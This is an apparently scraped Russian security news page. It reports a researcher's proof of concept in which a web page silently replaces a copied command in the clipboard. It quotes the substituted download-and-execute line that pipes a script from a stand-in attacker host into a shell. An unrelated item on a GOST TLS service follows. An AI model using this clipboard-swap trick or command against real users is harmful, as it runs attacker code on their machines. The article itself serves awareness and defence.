Эксперт показал подмену скопированной на веб-странице команды

Эксперт показал подмену скопированной на веб-странице команды

Ряд программистов, системных администраторов и исследователей привыкли копировать определённые куски кода на веб-страницах, а затем вставлять их, например, в консоль или терминал. Как оказалось, это пагубная практика, которая может привести к негативным для устройства последствиям.

Габриэль Фридлендер, основатель платформы для обучения основам кибербезопасности — Wizer, показал очевидный, но при этом интересный приём, который заставит по-новому взглянуть на процесс копирования-вставки с веб-страниц.

Суть в том, что при копировании страница может незаметно подменить содержимое буфера обмена, что приведёт к использованию совершенно другой команды на устройстве пользователя. Поскольку как новички, так и уже опытные сисадмины привыкли иногда «копипастить» код (характерный пример — со StackOverflow), будет полезно помнить про описанную Фридлендером технику.

Специалист даже опубликовал в блоге тривиальный демонстрационный код (proof-of-concept, PoC) и просит читателей попробовать скопировать простейшую команду, с которой знакомо подавляющее большинство системных администраторов:

 

После вставки скопированной команды в любой текстовый редактор пользователь увидит совершенно другое:

curl http://attacker-domain:8000/shell.sh | sh

Примечательно, что при вставке этой команды в терминал Linux она моментально выполнится, что создаёт ещё больший риск, ведь пользователь даже не успеет проверить корректность введённых данных.

Как пояснил Фридлендер, суть трюка кроется в JavaScript-коде, размещённом на демонстрационной странице:

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Солар запустил сервис защищённого доступа к веб-сайтам ГОСТ TLS

ГК «Солар» запустила сервис защищённого доступа к веб-ресурсам ГОСТ TLS. Разработка может обеспечить безопасное подключение к сайту с помощью сертифицированных средств криптографической защиты информации (СКЗИ).

Как отмечают в ГК «Солар», новый сервис работает на отечественных алгоритмах при наличии совместимости с зарубежными решениями.

Таким образом, владельцы веб-сайтов смогут успешно защищать данные посетителей, даже если зарубежные удостоверяющие центры отзовут сертификаты.

До 2022 года SSL-сертификаты выдавали зарубежные УЦ, но после известных событий ряд российских организаций столкнулся с отзывом таких сертификатов. Например, это коснулось крупных банков и государственных компаний.

Сегодня российские организации могут получить сертификаты от Минцифры РФ, однако там используется международный криптографический алгоритм RSA. В ГК «Солар» учли этот момент, чтобы гарантировать полноценное импортозамещение: ГОСТ TLS от вендора использует отечественный алгоритм шифрования с сертификатом российского коммерческого УЦ.

Предусмотрено даже отсутствие поддержки отечественного алгоритма. В этом случае соединение будет защищаться с помощью зарубежного аналога. «Солар» берёт на себя получение сертификаты TLS и подключение криптошлюза.

Клиент может воспользоваться вариантом сервиса, развёрнутым как на инфраструктуре «Солара», так и в облаке или в виртуальном дата-центре заказчика.

Сервис уже прошёл проверку на внутренних веб-ресурсах «Солар» и в настоящее время развёрнут на одном из крупных федеральных порталов.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru